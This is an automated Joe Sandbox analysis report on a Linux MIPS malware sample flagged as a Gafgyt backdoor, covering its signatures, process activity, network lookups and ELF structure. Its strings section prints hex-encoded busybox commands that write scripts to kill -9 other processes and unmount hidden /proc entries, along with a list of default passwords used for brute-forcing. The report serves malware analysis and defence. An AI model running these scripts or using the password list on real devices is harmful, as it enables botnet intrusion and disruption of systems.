Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1654413
MD5:0ccb56febcbc3891ef94b774df223a3a
SHA1:41c712f58bf2fc7d7d04f559b04661427f0dde42
SHA256:203200be09f86ab14c53c903aa57aacd29e949f6377fffaa20d088852e40270c
Tags:elf, user-abuse_ch

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654413
Start date and time:2025-04-02 10:52:29 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/mpsl.elf
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • mpsl.elf (PID: 5434, Parent: 5358, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 5438, Parent: 5434)
  • cleanup
No yara matches
No Suricata rule has matched

AV Detection

Source: mpsl.elf | Virustotal: Detection: 40%
Source: mpsl.elf | ReversingLabs: Detection: 36%
Source: /tmp/mpsl.elf (PID: 5438) | Socket: 127.0.0.1:22448
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sample | String containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: 654321
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: support
Source: ELF static info symbol of initial sample | .symtab present: no
Source: classification engine | Classification label: mal48.linELF@0/4@2/0
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/5382/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/230/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/110/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/231/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/111/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/232/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/112/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/233/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/113/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/234/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/114/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/235/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/115/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/236/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/116/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/237/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/117/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/238/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/118/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/239/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/119/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/914/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/914/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/914/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/10/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/917/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/917/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/917/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/11/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/12/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/13/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/14/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/15/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/16/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/5277/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/5277/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/5277/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/17/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/18/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/19/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/240/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3095/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3095/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3095/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/120/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/241/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/121/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/242/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1/maps
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/122/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/243/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/2/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/123/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/244/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/124/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/245/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1588/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1588/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1588/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/125/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/4/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/246/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/126/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/5/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/247/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/127/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/6/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/248/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/128/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/7/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/249/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/129/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/8/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/800/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/800/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/800/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/9/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1906/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1906/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1906/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/802/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/802/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/802/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/803/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/803/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/803/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/20/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/21/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/22/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/23/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/24/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/25/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/26/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/27/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/28/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/29/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3420/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3420/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/3420/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1482/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1482/fd
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1482/maps
Source: /tmp/mpsl.elf (PID: 5434) | File opened: /proc/1482/cmdline
Source: /tmp/mpsl.elf (PID: 5434) | Queries kernel information via 'uname'
Source: mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: exed the wor!/qemu-open.XXXXX
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: /tmp/qemu-open.SXsiu6
Source: mpsl.elf, 5434.1.000055b23097b000.000055b230a45000.rw-.sdmp, mpsl.elf, 5438.1.000055b23097b000.000055b230a45000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5438.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp | Binary or memory string: vmware
Source: mpsl.elf, 5434.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp, mpsl.elf, 5438.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp | Binary or memory string: qemu-arm
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp, mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: /qemu-open.XXXXX
Source: mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: mpsl.elf, 5434.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp, mpsl.elf, 5438.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp | Binary or memory string: D!!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
Source: mpsl.elf, 5434.1.000055b23097b000.000055b230a45000.rw-.sdmp, mpsl.elf, 5438.1.000055b23097b000.000055b230a45000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp, mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: U/tmp/qemu-open.SXsiu6\d
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp, mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-mipsel
Source: mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
MITRE ATT&CK Matrix (matched techniques with signature counts; tactic columns without a match are omitted)

  • Credential Access: OS Credential Dumping (1), Brute Force (1)
  • Discovery: Security Software Discovery (11)
  • Command and Control: Non-Application Layer Protocol (1), Application Layer Protocol (1)
No configs have been found
Behavior Graph

Behavior Graph ID: 1654413 | Sample: mpsl.elf | Startdate: 02/04/2025 | Architecture: LINUX | Score: 48

  • Process: mpsl.elf started; it in turn started a second mpsl.elf process
  • DNS/IP Info: daisy.ubuntu.com
  • Signature: Multi AV Scanner detection for submitted file

Source | Detection | Scanner | Label
mpsl.elf | 41% | Virustotal |
mpsl.elf | 36% | ReversingLabs | Linux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.24 | true | false | | high
    No contacted IP infos
    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
daisy.ubuntu.com | sh4.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | s-h.4-.Sakura.elf | malicious | Gafgyt, Mirai | 162.213.35.24
daisy.ubuntu.com | x-8.6-.Sakura.elf | malicious | Gafgyt, Mirai | 162.213.35.24
daisy.ubuntu.com | arm.elf | malicious | Mirai | 162.213.35.25
daisy.ubuntu.com | FBI.arm.elf | malicious | Gafgyt, Mirai | 162.213.35.24
daisy.ubuntu.com | FBI.sh4.elf | malicious | Gafgyt, Mirai | 162.213.35.24
daisy.ubuntu.com | FBI.arm7.elf | malicious | Gafgyt, Mirai | 162.213.35.25
daisy.ubuntu.com | FBI.mips.elf | malicious | Gafgyt, Mirai | 162.213.35.25
daisy.ubuntu.com | FBI.ppc.elf | malicious | Gafgyt, Mirai | 162.213.35.24
daisy.ubuntu.com | FBI.arm6.elf | malicious | Gafgyt, Mirai | 162.213.35.24
    No context
    No context
    No context
    Process:/tmp/mpsl.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:TgLJLG:TgLFG
    MD5:F38566EE0BC1CD8FBC1A2366D5C73FFE
    SHA1:670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
    SHA-256:8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
    SHA-512:E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/mpsl.elf.
    Process:/tmp/mpsl.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:TgLJLG:TgLFG
    MD5:F38566EE0BC1CD8FBC1A2366D5C73FFE
    SHA1:670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
    SHA-256:8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
    SHA-512:E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/mpsl.elf.
    Process:/tmp/mpsl.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:TgLJLG:TgLFG
    MD5:F38566EE0BC1CD8FBC1A2366D5C73FFE
    SHA1:670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
    SHA-256:8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
    SHA-512:E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/mpsl.elf.
    Process:/tmp/mpsl.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):362
    Entropy (8bit):3.8271042895218708
    Encrypted:false
    SSDEEP:6:UR5VceFXUFd2l/VeceFXUFkHVPj/VKAvVVyAb/3hM/V+4D/VH:Isey6beyGHyaVIAbRMfF
    MD5:0F75D2439A797C3D8C9FEC3E4D9D6689
    SHA1:1C5D6A0A6570A08E4F8BBA4D32B299CF7B95228D
    SHA-256:5295EEC2C1C3661547ECFF60983F7E2D51DDDB88593E03F9FD1F82EDDA2C68C2
    SHA-512:5A17AB720828DC869A64243F06C5CC56280A4EFCD6D722361D5B10563DC169582E0F15DAEEB93DA254030444F95BFB55906820DC6484CBD0E59B01EBF325842A
    Malicious:false
    Reputation:low
    Preview:400000-42d000 r-xp 00000000 fd:00 531567 /tmp/mpsl.elf.43d000-43e000 rw-p 0002d000 fd:00 531567 /tmp/mpsl.elf.43e000-445000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].
    File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):5.151579209660246
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:mpsl.elf
    File size:186'616 bytes
    MD5:0ccb56febcbc3891ef94b774df223a3a
    SHA1:41c712f58bf2fc7d7d04f559b04661427f0dde42
    SHA256:203200be09f86ab14c53c903aa57aacd29e949f6377fffaa20d088852e40270c
    SHA512:f0f75a7882332424d0d9e2afdfbfbae095ef90fdf51f1c31a3477d007816bfb8f3091e6c71094f30ea81f2b522d985b38e24c377faf37fe42ddfa53223eea215
    SSDEEP:1536:nyUlqQlLgEhCkGpw9SqrmSbDrz4ies54bDKcElLbdTlnObr:nycqQtUdzieXed2
    TLSH:C1049486BF503EFFC85ECD3341A5CA0A159C89191294BFB76A34E418B79B10E99D3C9C
    File Content Preview:.ELF....................`.@.4...........4. ...(...............@...@. ... ...............<...<.C.<.C.\....N.............................................'...................<.Q.'!.............9'.. ........................<.P.'!... .........9'.. ............

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:MIPS R3000
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x400260
    Flags:0x1007
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:3
    Section Header Offset:186096
    Section Header Size:40
    Number of Section Headers:13
    Header String Table Index:12
    Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
    | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
    .init | PROGBITS | 0x400094 | 0x94 | 0x7c | 0x0 | 0x6 | AX | 0 | 0 | 4
    .text | PROGBITS | 0x400110 | 0x110 | 0x2a020 | 0x0 | 0x6 | AX | 0 | 0 | 16
    .fini | PROGBITS | 0x42a130 | 0x2a130 | 0x4c | 0x0 | 0x6 | AX | 0 | 0 | 4
    .rodata | PROGBITS | 0x42a180 | 0x2a180 | 0x2aa0 | 0x0 | 0x2 | A | 0 | 0 | 16
    .ctors | PROGBITS | 0x43d03c | 0x2d03c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
    .dtors | PROGBITS | 0x43d044 | 0x2d044 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
    .data.rel.ro | PROGBITS | 0x43d050 | 0x2d050 | 0xa8 | 0x0 | 0x3 | WA | 0 | 0 | 4
    .data | PROGBITS | 0x43d100 | 0x2d100 | 0xc0 | 0x0 | 0x3 | WA | 0 | 0 | 16
    .got | PROGBITS | 0x43d1c0 | 0x2d1c0 | 0x4d8 | 0x4 | 0x10000003 | WAp | 0 | 0 | 16
    .sbss | NOBITS | 0x43d698 | 0x2d698 | 0x1c | 0x0 | 0x10000003 | WAp | 0 | 0 | 4
    .bss | NOBITS | 0x43d6c0 | 0x2d698 | 0x4800 | 0x0 | 0x3 | WA | 0 | 0 | 16
    .shstrtab | STRTAB | 0x0 | 0x2d698 | 0x56 | 0x0 | 0x0 | | 0 | 0 | 1

    Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
    LOAD | 0x0 | 0x400000 | 0x400000 | 0x2cc20 | 0x2cc20 | 5.1696 | 0x5 | R E | 0x10000 | | .init .text .fini .rodata
    LOAD | 0x2d03c | 0x43d03c | 0x43d03c | 0x65c | 0x4e84 | 4.7306 | 0x6 | RW | 0x10000 | | .ctors .dtors .data.rel.ro .data .got .sbss .bss
    DYNAMIC | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |

    Network Behavior

    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Apr 2, 2025 10:53:21.085181952 CEST | 47878 | 53 | 192.168.2.13 | 1.1.1.1
    Apr 2, 2025 10:53:21.085182905 CEST | 34767 | 53 | 192.168.2.13 | 1.1.1.1
    Apr 2, 2025 10:53:21.184479952 CEST | 53 | 34767 | 1.1.1.1 | 192.168.2.13
    Apr 2, 2025 10:53:21.184504986 CEST | 53 | 47878 | 1.1.1.1 | 192.168.2.13

    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
    Apr 2, 2025 10:53:21.085181952 CEST | 192.168.2.13 | 1.1.1.1 | 0xfb09 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
    Apr 2, 2025 10:53:21.085182905 CEST | 192.168.2.13 | 1.1.1.1 | 0x1d1e | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
    Apr 2, 2025 10:53:21.184504986 CEST | 1.1.1.1 | 192.168.2.13 | 0xfb09 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false
    Apr 2, 2025 10:53:21.184504986 CEST | 1.1.1.1 | 192.168.2.13 | 0xfb09 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false

    System Behavior

    Start time (UTC):08:53:19
    Start date (UTC):02/04/2025
    Path:/tmp/mpsl.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9